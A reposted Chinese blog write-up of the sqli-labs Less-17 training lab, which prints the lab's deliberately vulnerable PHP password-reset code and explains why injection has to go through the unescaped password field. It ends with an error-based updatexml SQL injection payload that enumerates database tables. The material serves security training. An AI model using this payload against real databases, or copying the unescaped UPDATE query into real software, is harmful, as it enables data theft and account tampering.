sql-labs:less-17

转载

深圳市贝福科技 2021-09-04 10:39:00

文章标签 mysql html sql xml git 文章分类 MySQL 数据库

输错密码，就来这一套

sql-labs:less-17_sql

进行代码审计


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-17 Update Query- Error based - String</title>
</head>

<body bgcolor="#000000">

<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"><font color="#FFFF00"> [PASSWORD RESET] </br></font>&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br></div>

<div  align="center" style="margin:20px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">

<div style="padding-top:10px; font-size:15px;">


<!--Form to post the contents -->
<form action="" name="form1" method="post">

<div style="margin-top:15px; height:30px;">User Name &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: &nbsp;&nbsp;&nbsp;&nbsp;
<input type="text"  name="uname" value=""/>  </div>

<div> New Password : &nbsp; &nbsp;
<input type="text" name="passwd" value=""/></div></br>
<div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">



<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
  {
if(!empty($value))
    {
// truncation (see comments)
$value = substr($value,0,15);
    }

// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
      {
$value = stripslashes($value);
      }

// Quote if not a number
if (!ctype_digit($value))
      {
$value = "'" . mysql_real_escape_string($value) . "'";
      }

else
    {
$value = intval($value);
    }
return $value;
  }

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))

{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);  

$passwd=$_POST['passwd'];


//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'New Password:'.$passwd."\n");
fclose($fp);


// connectivity 
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
if($row)
  {
//echo '<font color= "#0000ff">'; 
$row1 = $row['username'];   
//echo 'Your Login name:'. $row1;
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
echo "<br>";



if (mysql_error())
    {
echo '<font color= "#FFFF00" font size = 3 >';
print_r(mysql_error());
echo "</br></br>";
echo "</font>";
    }
else
    {
echo '<font color= "#FFFF00" font size = 3 >';
//echo " You password has been successfully updated " ;   
echo "<br>";
echo "</font>";
    }

echo '<img src="../images/flag1.jpg"   />'; 
//echo 'Your Password:' .$row['password'];
echo "</font>";



    }
else  
  {
echo '<font size="4.5" color="#FFFF00">';
//echo "Bug off you Silly Dumb hacker";
echo "</br>";
echo '<img src="../images/slap1.jpg"   />';

echo "</font>";  
  }
}

?>


</font>
</div>
</body>
</html>

下面有几个关键的代码需要认识：

function check_input($value) //过滤用户名的输入
  {
  if(!empty($value)) 
    {
    // truncation (see comments)
    $value = substr($value,0,15); //截取前面15个字符串
    }

    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc()) //查看魔术符号是否开启，开启就返回 1 即magic_quotes_gpc=On
      {
      $value = stripslashes($value);  //删除由addslashes()添加的反斜杠
      }

    // Quote if not a number
    if (!ctype_digit($value)) //判断是不是数字，是数字就返回true
      {
      $value = "'" . mysql_real_escape_string($value) . "'"; //转义字符串
      }

  else
    {
    $value = intval($value); //转换为整形
    }
  return $value;
  }

总之，经过一系列的过滤，想要在username上面下功夫是不可能的了，只能通过password进行注入

@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
  if($row)
  {
      //echo '<font color= "#0000ff">'; 
    $row1 = $row['username'];   
    //echo 'Your Login name:'. $row1;
    $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
    mysql_query($update);
      echo "<br>";

这就是查询的源代码，可以通过passwd下文章

这由于是修改密码的模块，直接输入admin即可成功修改，但是我们要查询数据库等信息，就需要使用xml报错注入：

下面是爆表的例子，payload不过多阐述了

' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()
),0x7e),1)##

作者：{Zeker62}，转载请注明原文链接

本文章为转载内容，我们尊重原作者对文章享有的著作权。如有内容错误或侵权问题，欢迎原作者联系我们进行内容更正或删除文章。

上一篇：制作socks5的docker镜像

下一篇：2012 Multi-University Training Contest 2

提问和评论都可以，用心的回复会被更多人看到评论

发布评论

相关文章

官方博客	全部文章	热门标签	班级博客
了解我们	网站地图	意见反馈

鸿蒙开发者社区	51CTO学堂
51CTO	软考资讯

sql-labs:less-17

sql-labs:less-17

51CTO博客